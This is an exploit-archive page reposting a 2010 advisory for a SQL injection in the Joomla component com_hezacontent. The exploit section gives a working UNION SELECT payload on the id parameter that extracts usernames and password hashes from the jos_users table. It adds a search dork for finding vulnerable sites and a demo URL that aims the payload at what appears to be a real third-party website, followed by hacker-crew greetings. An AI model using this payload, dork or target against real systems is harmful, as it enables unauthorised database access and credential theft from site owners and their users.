SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

Joomla Component (id) com_hezacontent SQL injection Vulnerability


Arrow  ExploitAlert : 7907
Arrow  Credit : kaMtiEz
Arrow  Date : 10.03.2010

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

[!]========================================================================
===[!]

[~] Joomla Component com_hezacontent SQL injection Vulnerability (id)
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 9 march, 2010

[!]========================================================================
===[!]

[ Software Information ]

[+] Vendor : ttp://joomlacode.org/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download :
http://joomlacode.org/gf/download/frsrelease/11313/46163/com_hezacontent.zi
p
[+] Version : 1.0

[!]========================================================================
===[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_hezacontent&view=item&id=[INDONESIANC
ODER]

[ XpL ]

-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11
,12,13,14,15,16,17,18+from+jos_users--

[ d3m0 ]

http://bbh.coadesign.org/index.php?option=com_hezacontent&view=item&id=-1+u
nion+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,
13,14,15,16,17,18+from+jos_users--

dan lain sebagainya ;]

[!]========================================================================
===[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+]
tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzh
ack
[+] Contrex,onthel,yasea,bugs,Pathloader,cimpli,MarahMerah,senot,all
INDONESIANCODER MEMBERS
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue-
[+] #becak - #indonesiancoder - #kill-9
[ NOTE ]

[+] Rawk !
[+] gonzhack : buruan kesini dodolllllllllllllllllll !!

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
[+] ./e0f




Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.